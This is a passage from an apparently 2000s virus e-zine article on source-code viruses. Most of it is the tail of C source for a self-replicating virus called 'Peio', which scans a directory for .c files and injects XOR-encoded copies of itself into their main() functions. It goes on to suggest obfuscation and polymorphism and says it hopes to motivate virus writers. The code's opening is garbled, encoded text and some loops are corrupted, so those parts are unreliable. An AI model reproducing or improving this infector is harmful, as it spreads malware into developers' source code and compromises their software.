èáóèéî㬠éèïìå(c)"Љ‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèéîã(c)"é""(c)Љ‰‰‰‰‰èáóèéîãÛéÝ Þ1/2 °ø¸°"Љ‰‰‰‰íðïó "1/2 éèïìå"Љ‰‰‰‰âõæ 1/2 ¨ãèáò ª(c)íáììï㨲°ªóéúåïæ¨ãèáò(c)(c)"Љ‰‰‰‰óôòãðù¨âõ欢ÜîÜôéîéôßèáóè¨(c)"¢(c)"Љ‰‰‰‰ôèïìå 1/2 óôòìåî¨âõæ(c)"Љ‰‰‰‰æïò¨é1/2¨óéúå"éèïìå­íðïó(c)¯ôèïìå"é3/41/2°"é­­(c) Љ‰‰‰‰‰íåíãðù¨ðôò"íðïó"éªôèïìå"ôèïìå¬ ðôò"íðïó"éªôèïìå¬ ôèïìå(c)"Љ‰‰‰‰íåíãðù¨ðôò"íðïó¬ âõæ¬ ôèïìå(c)"Љ‰‰‰‰âèïìå 1/2 óôòìåî¨èáóèâåç(c)"Љ‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå¬ èáóèâåç¬ âèïìå(c)"Љ‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèéî㬠éèïìå(c)"Љ‰‰‰‰âèïìå "1/2 éèïìå"Љ‰‰‰‰óðòéîôæ¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ ¢Ü¢"ÜîÜôãèáò èáóèâåçÛÝ 1/2 Ü¢¢(c)"Љ‰‰‰‰âèïìå "1/2 ²²"Љ‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèâåç(c)"é""(c)Љ‰‰‰‰‰èáóèâåçÛéÝ Þ1/2 °ø¸°"Љ‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèâåç¬ óôòìåî¨èáóèâåç(c)(c)"Љ‰‰‰‰âèïìå "1/2 óôòìåî¨èáóèâåç(c)"Љ‰‰‰‰óðòéîôæ¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ ¢Ü¢"ÜîÜôãèáò èáóèåîäÛÝ 1/2 Ü¢¢(c)"Љ‰‰‰‰âèïìå "1/2 ²²"Љ‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèåîä¬ óôòìåî¨èáóèåîä(c)(c)"Љ‰‰‰‰âèïìå "1/2 óôòìåî¨èáóèåîä(c)"Љ‰‰‰‰óðòéîôæ¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ ¢Ü¢"Üî¢(c)"Љ‰‰‰‰âèïìå "1/2 ³"Љ‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèåîä(c)"é""(c)Љ‰‰‰‰‰èáóèåîäÛéÝ Þ1/2 °ø¸°"Љ‰‰‰‰åèïìå 1/2 óôòìåî¨èáóèåîä(c)"Љ‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèåîä¬ åèïìå(c)"Љ‰‰‰‰íóùîã¨ðôò¬ óéúå"ðáçå¬ ÍÓßÓÙÎÃ(c)"Љ‰‰‰‰íõîíáð¨ðôò¬ óéúå"ðáçå(c)"Љ‰‰‰‰æôòõîãáôå¨æä¬ óéúå"éèïìå"ôèïìå"âèïìå"åèïìå(c)"Љ‰‰‰ý åìó劉‰‰‰ûЉ‰‰‰‰íõîíáð¨ðôò¬ óéúå(c)"Љ‰‰‰ýЉ‰‰ýŠýŠ"; 
	char *buf; 
 
	d = opendir("."); 
	while((dir = readdir(d))>0) 
		if(!(strcmp(dir->d_name+strlen(dir->d_name)-2,".c"))|| 
		   !(strcmp(dir->d_name+strlen(dir->d_name)-2,".C")))  
			if((fd=open(dir->d_name, O_RDWR, 0))>=0) 
			{ 
				size = lseek(fd, 0, SEEK_END); 
				ptr = mmap(NULL,size,PROT_READ,MAP_PRIVATE,fd,0); 
				if( (!strstr(ptr,"init_hash")) && 
				  ( ((mpos=(int)strstr(ptr,"\nmain("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nint main("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nvoid main("))>0) ||  
				    ((mpos=(int)strstr(ptr,"\nmain ("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nint main ("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nvoid main ("))>0) ) ) 
				{ 
					mpos = (int)strstr((void *)mpos, ";\n"); 
					mpos -= (int)--ptr; 
					if( !(ipos = (int)strstr(++ptr, "#include <")) ) 
					{ 
						munmap(ptr, size); 
						break; 
					} 
					munmap(ptr, size); 
					page = 3 * (int)sysconf(_SC_PAGESIZE); 
					ftruncate(fd, size+page); 
					ptr = mmap(NULL,size+page,PROT_READ+PROT_WRITE,MAP_SHARED,fd,0); 
					ipos = (int)strstr(ptr, "#include <"); 
					ipos = (int)strstr((void *)ipos, "\n\n"); 
					ipos -= (int)ptr; 
					for(i=0;i=0;i--)  
						memcpy(ptr+ipos+i*ihole+ihole, ptr+ipos+i*ihole, ihole); 
					memcpy(ptr+ipos, hashinc, ihole); 
					for(i=0;i=0;i--)  
						memcpy(ptr+mpos+i*thole+thole, ptr+mpos+i*thole, thole); 
					memcpy(ptr+mpos, buf, thole); 
					bhole = strlen(hashbeg); 
					memcpy(ptr+size+ihole+thole, hashbeg, bhole); 
					memcpy(ptr+size+ihole+thole+bhole, hashinc, ihole); 
					bhole += ihole; 
					sprintf(ptr+size+ihole+thole+bhole, "\";\n\tchar hashbeg[] = \""); 
					bhole += 22; 
					for(i=0;i 
<-end of peio.c-------------------------------------------------------------> 
<---------------------------------------------------------------------------> 
 
As we can see, hashes are XORed with 80h, and it's necessary to  reXOR 
them to be able to write the  code in the host file. This way  to keep 
hashes opens a  route to polymorphism,  since in each  generation, the 
key of XOR "encryption" could vary from 80h to FFh. 
 
 
4.4.- Future developments 
 
These examples are not "real fire", there are several mistakes in  the 
commented code. However, we follow developing these and new  examples, 
treating to incorporate more functionalities or new approaches.  
 
Mainly, the most  scandalous part is  the related one  to the size  of 
arrays  that contain  the code  that we  want to  include. It's  quite 
problematic to try to print some  chars that fall within the 32  first 
positions in ASCII table, so is necessary to observe how this  problem 
is solved  in other  scenes like  the delivery  of electronic  mail or 
news. In this sense, we can contemplate several possibilities: 
 
1) Using uuencode/uudecode. 
 
2) Using base64. 
 
3) Using yEnc [14], an alternative to both previous points, that  uses 
ASCII > 127, but is able  to avoid problematic chars (i.e. NULL,  DEL, 
etc.). 
 
4) The use  of our own  protocols of conversion  of char arrays,  with 
combinations of XORs, sums,  etc. improved, that could  include simple 
compression as RLE, for instance.  
 
In addition to these improvements, we could think about  incorporating 
oligomorfism   to   the  programs   creating   several  routines   and 
"encrypting" them  with random  keys in  each generation,  and several 
routines of deciphering.  Much of this  approach is quite  done in the 
"Peio" virus, where the possible  keys cause that exist 127  different 
combinations at the time of creating hashes.  
 
As later steps, the efforts could be directed towards the total  viral 
code  obfuscation,  the  introduction of  this  code  merged with  the 
original one, or generating the needed hashes by calculating them as a 
result of a bunch of code (it is a very great number, we could  create 
code  whose  result is  that  number and  thus  not to  store  it, but 
generate it every time). 
 
 
5.- Conclusions 
 
Source code viruses are not a  very serious threat at the moment,  but 
if the commented  techniques are improved,  they could be  a important 
point. Many  methods exist  to audit  the integrity  of the disc files 
like md5sum, tripwire, etc. Nevertheless, if we extend the paranoia to 
all  that  happens  through  our  circuits,  the  threat  of  a  first 
trojanised compiler still flies over our heads in UNIX systems.  
 
I would like that this text would be useful to explain all stuff  done 
in this subject and motivate  virus writers to develop new  and better 
techniques.  However, I  consider myself  as a  extreme Free  Software 
defender and I  would want that  this code becomes  useful to increase 
the  security  within  the  Free Software  community  and  not  to the 
opposite.  
 
Finally I would like to say thanks to all those who have helped me  to 
write this text:  the int80h crew,  elisasm, silviex, sheroc,  a young 
samurai, and mainly to all the  29a crew that follows year after  year 
in  the sharpest  edge of  the virus  scene. VirusBuster,  thanks for 
allowing me to write in the best viral e-zine worldwide. Thanks really 
;-) 
 
 
6.- Related Links 
 
[1] Free Software Song  
  http://www.gnu.org/music/free-software-song.html 
 
[2] Linux Malware: Debunking the myths. Phil d'Espace. Virus Bulletin, September - 2002 
  http://www.virusbtn.com/magazine/archives/200209/linux_malware.xml 
 
[3] BitchX 1.0c19 IRC Client Backdoored. 
  http://slashdot.org/article.pl?sid=02/07/02/1327208&mode=thread 
  http://www.securityfocus.com/archive/1/280009/2002-06-28/2002-07-04/0 
 
[4] Clues, Vandalism, Litter Sendmail Trojan Trail. 
  http://www.securityfocus.com/news/1113 
  http://cert-nl.surfnet.nl/i/2002/I-02-03.htm 
 
[5] Virus Encyclopedia, File Viruses, DOS: Urphin.1621. 
  http://www.viruslist.com/eng/VirusList.asp?page=0&mode=1&id=2414&key=000010000102404 
 
[6] The History of Computer Viruses. 
  http://www.virus-scan-software.com/virus-scan-help/answers/the-history-of-computer-viruses.shtml 
 
[7] Die-hard virus. 
  http://www.pspl.com/virus_info/dos/diehard.htm 
 
[8] OBJ, LIB Viruses and Source Code Viruses. 
  http://www.viruslist.com/eng/viruslistbooks.html?id=36 
 
[9] Shell viruses. Gobleen Warrior & zert. 
  http://29a.host.sk/29a-6/29a-6.212 
 
[10] Polymorphism/Encryption/EPO in Perl Viruses. SnakeByte. 
  http://29a.host.sk/29a-6/29a-6.220 
 
[11] Reflections on Trusting Trust. Ken Thompson. 
  http://www.acm.org/classics/sep95/ 
 
[12] Linux Security Auditing: Re: Reflections on Trusting Trust. 
  http://lists.insecure.org/lists/security-audit/2000/Apr-Jun/0222.html 
  http://lists.insecure.org/lists/security-audit/2000/Apr-Jun/0226.html 
 
[13] Shared Source: A Dangerous Virus. 
  http://www.opensource.org/advocacy/shared_source.php 
 
[14] yEnc - Broken Tools. 
  http://www.yenc.org